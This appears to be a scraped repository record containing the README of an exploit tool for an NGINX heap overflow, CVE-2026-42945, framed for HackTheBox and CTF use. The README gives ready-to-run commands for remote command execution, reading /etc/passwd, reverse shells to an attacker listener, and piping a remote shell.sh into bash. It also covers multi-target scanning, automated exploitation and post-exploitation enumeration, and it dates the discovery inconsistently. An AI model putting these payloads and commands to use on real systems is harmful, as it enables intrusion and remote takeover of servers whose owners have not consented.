[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"project-81036":3},{"id":4,"name":5,"fullName":6,"owner":7,"repo":5,"description":8,"homepage":9,"htmlUrl":9,"language":10,"languages":9,"totalLinesOfCode":9,"stars":11,"forks":12,"watchers":13,"openIssues":14,"contributorsCount":14,"subscribersCount":14,"size":14,"stars1d":13,"stars7d":15,"stars30d":12,"stars90d":14,"forks30d":14,"starsTrendScore":16,"compositeScore":17,"rankGlobal":9,"rankLanguage":9,"license":9,"archived":18,"fork":18,"defaultBranch":19,"hasWiki":20,"hasPages":18,"topics":21,"createdAt":9,"pushedAt":9,"updatedAt":22,"readmeContent":23,"aiSummary":24,"trendingCount":14,"starSnapshotCount":14,"syncStatus":25,"lastSyncTime":26,"discoverSource":27},81036,"CVE-2026-42945-POC","cipherspy\u002FCVE-2026-42945-POC","cipherspy","exploit for CVE-2026-42945",null,"Python",37,8,1,0,7,3,2.86,false,"main",true,[],"2026-06-12 02:04:10","# CVE-2026-42945 (NGINX Rift) - HTB-Ready Exploit\n\nStandalone exploit for the NGINX heap buffer overflow vulnerability discovered in 2024. This version is optimized for HackTheBox and CTF environments where you can't set up Docker containers.\n\n## Vulnerability Details\n\n**CVE-2026-42945** is a critical heap buffer overflow in NGINX's `ngx_http_rewrite_module` that has existed since 2008 (version 0.6.27). The bug occurs when:\n\n1. A `rewrite` directive contains `?` in the replacement (sets `is_args = 1`)\n2. A `set` directive captures part of the URI\n3. The length calculation happens on a zeroed sub-engine (sees `is_args = 0`)\n4. The copy phase runs on the main engine (sees `is_args = 1`)\n5. URI escaping expands characters 3x, overflowing the undersized buffer\n\n### Affected Versions\n- **NGINX Open Source**: 0.6.27 - 1.30.0\n- **NGINX Plus**: R32 - R36\n\n### Fixed Versions\n- **NGINX Open Source**: 1.31.0, 1.30.1\n- **NGINX Plus**: R36 P4, R35 P2, R32 P6\n\n## Files Included\n\n1. **nginx_rift_htb.py** - Main exploit script\n2. 
**nginx_rift_helper.py** - Reconnaissance and info leak helper\n3. **README.md** - This file\n\n## Requirements\n\n```bash\n# Python 3.6+\nsudo apt update\nsudo apt install python3 netcat-openbsd\n\n# No additional Python packages needed - uses only stdlib!\n```\n\n## Quick Start\n\n### 1. Check if Target is Vulnerable\n\n```bash\npython3 nginx_rift_htb.py --target 10.10.11.x --check-only\n```\n\nThis will:\n- Detect if NGINX is running\n- Try to identify the version\n- Check for the `\u002Fapi\u002F` endpoint\n- Report if target appears vulnerable\n\n### 2. Reconnaissance (Recommended)\n\n```bash\npython3 nginx_rift_helper.py --target 10.10.11.x --all\n```\n\nThis performs:\n- NGINX fingerprinting\n- Version detection\n- Endpoint discovery\n- Information leak detection\n- Behavioral analysis\n\n### 3. Run the Exploit\n\n**Execute a command:**\n```bash\npython3 nginx_rift_htb.py --target 10.10.11.x --port 80 --cmd \"id\"\n```\n\n**Get a reverse shell:**\n```bash\n# Start listener first (in another terminal)\nnc -lvnp 4444\n\n# Run exploit\npython3 nginx_rift_htb.py --target 10.10.11.x --shell --lhost 10.10.14.5 --lport 4444\n```\n\n## Usage Examples\n\n### Basic Command Execution\n\n```bash\n# Execute 'id' command\npython3 nginx_rift_htb.py --target 10.10.11.23 --cmd \"id\"\n\n# Execute 'whoami'\npython3 nginx_rift_htb.py --target 10.10.11.23 --cmd \"whoami\"\n\n# Read \u002Fetc\u002Fpasswd\npython3 nginx_rift_htb.py --target 10.10.11.23 --cmd \"cat \u002Fetc\u002Fpasswd\"\n```\n\n### Reverse Shell\n\n```bash\n# Terminal 1: Start listener\nnc -lvnp 4444\n\n# Terminal 2: Run exploit\npython3 nginx_rift_htb.py \\\n    --target 10.10.11.23 \\\n    --shell \\\n    --lhost 10.10.14.5 \\\n    --lport 4444 \\\n    --verbose\n```\n\n### Custom Addresses (If ASLR is disabled or you have leaks)\n\n```bash\npython3 nginx_rift_htb.py \\\n    --target 10.10.11.23 \\\n    --cmd \"id\" \\\n    --heap-base 0x555555659000 \\\n    --libc-base 0x7ffff77ba000\n```\n\n### Advanced 
Options\n\n```bash\npython3 nginx_rift_htb.py \\\n    --target 10.10.11.23 \\\n    --port 8080 \\\n    --cmd \"curl http:\u002F\u002F10.10.14.5\u002Fshell.sh | bash\" \\\n    --tries 20 \\\n    --verbose\n```\n\n## Understanding the Exploit\n\n### How It Works\n\n1. **Heap Spray**: The exploit sends multiple POST requests with crafted bodies containing a fake `ngx_pool_cleanup_s` structure\n2. **Overflow Trigger**: Sends a GET request to `\u002Fapi\u002F` with specially crafted URI that will overflow when escaped\n3. **Cleanup Hook**: The overflow corrupts an adjacent pool's cleanup pointer to point to our fake structure\n4. **Code Execution**: When the pool is destroyed, it calls `system()` with our command\n\n### Key Parameters\n\n- **Target bytes**: 6-byte addresses that must contain only URL-safe characters\n- **Spray body**: 4000-byte POST body containing fake cleanup structure\n- **Overflow payload**: 349 'A' + 969 '+' characters that expand 3x during escape\n\n### ASLR Considerations\n\nThe exploit assumes **ASLR is disabled** or you know the addresses. On HTB:\n\n- Some boxes disable ASLR for easier exploitation\n- Others require finding an information leak\n- The helper script can assist with reconnaissance\n\nIf ASLR is enabled, you may need to:\n1. Find an info leak in the application\n2. Brute force (requires many attempts)\n3. 
Use partial overwrites (advanced)\n\n## Troubleshooting\n\n### \"Target doesn't appear to be running NGINX\"\n\n- Verify the target is actually running NGINX\n- Check if the port is correct\n- May be behind a WAF\u002Fproxy\n\n### \"Could not confirm \u002Fapi\u002F endpoint\"\n\nThe vulnerable configuration requires:\n```nginx\nlocation ~ ^\u002Fapi\u002F(.*)$ {\n    rewrite ^\u002Fapi\u002F(.*)$ \u002Finternal?migrated=true;\n    set $original_endpoint $1;\n}\n```\n\n- The exploit may still work if rewrite+set exist elsewhere\n- Try different common paths: `\u002Fapi\u002F`, `\u002Fadmin\u002F`, `\u002Finternal\u002F`\n\n### \"All exploitation attempts failed\"\n\nPossible reasons:\n1. **ASLR is enabled** - Addresses are randomized\n   - Solution: Find info leak or brute force\n   \n2. **Different libc version** - `system()` at different offset\n   - Solution: Try all offsets with `--verbose`\n   \n3. **Version not vulnerable** - Fixed version or different config\n   - Solution: Verify version with helper script\n   \n4. **WAF\u002FIDS blocking** - Security controls in place\n   - Solution: May need evasion techniques\n\n5. 
**Wrong endpoint** - Not using rewrite+set combo\n   - Solution: Find the actual vulnerable endpoint\n\n### Verbose Mode\n\nAlways use `--verbose` for debugging:\n\n```bash\npython3 nginx_rift_htb.py --target 10.10.11.23 --cmd \"id\" --verbose\n```\n\nThis shows:\n- Each spray request status\n- Connection attempts\n- Overflow trigger timing\n- Crash detection logic\n\n## HTB-Specific Tips\n\n### Finding Your VPN IP\n\n```bash\n# Find your tun0 IP\nip addr show tun0 | grep inet\n\n# Use this IP for --lhost\npython3 nginx_rift_htb.py --target TARGET --shell --lhost YOUR_TUN0_IP --lport 4444\n```\n\n### Stabilizing Shell\n\nOnce you get initial access:\n\n```bash\n# Upgrade to TTY\npython3 -c 'import pty; pty.spawn(\"\u002Fbin\u002Fbash\")'\n\n# Background and set terminal\nCtrl+Z\nstty raw -echo; fg\nexport TERM=xterm\n```\n\n### Common HTB Enumeration After Shell\n\n```bash\n# Check current user\nid\nwhoami\n\n# Check for flags\nfind \u002F -name \"user.txt\" 2>\u002Fdev\u002Fnull\nfind \u002F -name \"root.txt\" 2>\u002Fdev\u002Fnull\n\n# Check sudo permissions\nsudo -l\n\n# Check SUID binaries\nfind \u002F -perm -4000 2>\u002Fdev\u002Fnull\n```\n\n## Advanced Usage\n\n### Custom Payload Generation\n\nIf you need to customize the payload:\n\n```python\n# Edit the make_body() function in nginx_rift_htb.py\n# Adjust BODY_LEN for different configurations\n# Modify the overflow string (349 'A' + 969 '+')\n```\n\n### Multiple Targets\n\n```bash\n# Create a target list\ncat targets.txt\n10.10.11.23\n10.10.11.24\n10.10.11.25\n\n# Test each one\nwhile read target; do\n    echo \"Testing $target\"\n    python3 nginx_rift_htb.py --target $target --check-only\ndone \u003C targets.txt\n```\n\n### Automated Exploitation\n\n```bash\n#!\u002Fbin\u002Fbash\nTARGET=$1\nLHOST=$2\n\necho \"[*] Starting listener...\"\nnc -lvnp 4444 &\nLISTENER_PID=$!\n\nsleep 2\n\necho \"[*] Running exploit...\"\npython3 nginx_rift_htb.py \\\n    --target $TARGET \\\n    --shell \\\n    --lhost $LHOST 
\\\n    --lport 4444 \\\n    --verbose\n\nwait $LISTENER_PID\n```\n\n## Technical Details\n\n### Vulnerable Code Pattern\n\n```nginx\nlocation ~ ^\u002Fapi\u002F(.*)$ {\n    rewrite ^\u002Fapi\u002F(.*)$ \u002Finternal?migrated=true;  # Sets is_args=1\n    set $original_endpoint $1;                     # Allocates based on is_args=0\n}\n```\n\n### Exploitation Flow\n\n```\n1. Spray POST → Fill heap with fake cleanup structures\n2. GET \u002Fapi\u002FAAAA...++++...X → Trigger overflow\n3. Overflow corrupts adjacent pool cleanup pointer\n4. Pool destroyed → Calls system(cmd)\n```\n\n### Memory Layout\n\n```\n[Heap Spray Body - 4000 bytes]\n+0:  system_addr (8 bytes)\n+8:  data_addr (8 bytes)\n+16: next (8 bytes, NULL)\n+24: command_string (variable)\n+remaining: padding 'A'\n```\n\n## References\n\n- Original POC: https:\u002F\u002Fgithub.com\u002Fp3Nt3st3r-sTAr\u002FCVE-2026-42945-POC\n- Technical Write-up: https:\u002F\u002Fdepthfirst.com\u002Fresearch\u002Fnginx-rift\n- NGINX Advisory: https:\u002F\u002Fmy.f5.com\u002Fmanage\u002Fs\u002Farticle\u002FK000160932\n- CVE Details: https:\u002F\u002Fcve.mitre.org\u002Fcgi-bin\u002Fcvename.cgi?name=CVE-2026-42945\n\n## Disclaimer\n\nThis tool is provided for educational purposes and authorized security testing only. Using this against systems you don't own or lack explicit permission to test is illegal. The author assumes no liability for misuse.\n\n## Credits\n\n- Original vulnerability discovered by [depthfirst](https:\u002F\u002Fdepthfirst.com)\n- Original POC: p3Nt3st3r-sTAr\n- HTB adaptation: Modified for standalone use\n\n## License\n\nEducational\u002FResearch purposes only. Use responsibly.\n","This project is a standalone exploitation tool for CVE-2026-42945, a vulnerability in NGINX's `ngx_http_rewrite_module` that has been present since 2008. Its core functions include checking whether a target is vulnerable, performing reconnaissance and assisting with information leaks, and exploiting the vulnerability to execute commands or obtain a reverse shell. Technically, the tool is written in Python, requires no additional Python libraries (standard library only), and is specifically optimized for use in HackTheBox and CTF competition environments. It is intended for cybersecurity researchers and penetration testers conducting vulnerability research or security assessments, especially in restricted environments where Docker containers cannot be set up.",2,"2026-06-11 04:03:17","CREATED_QUERY"]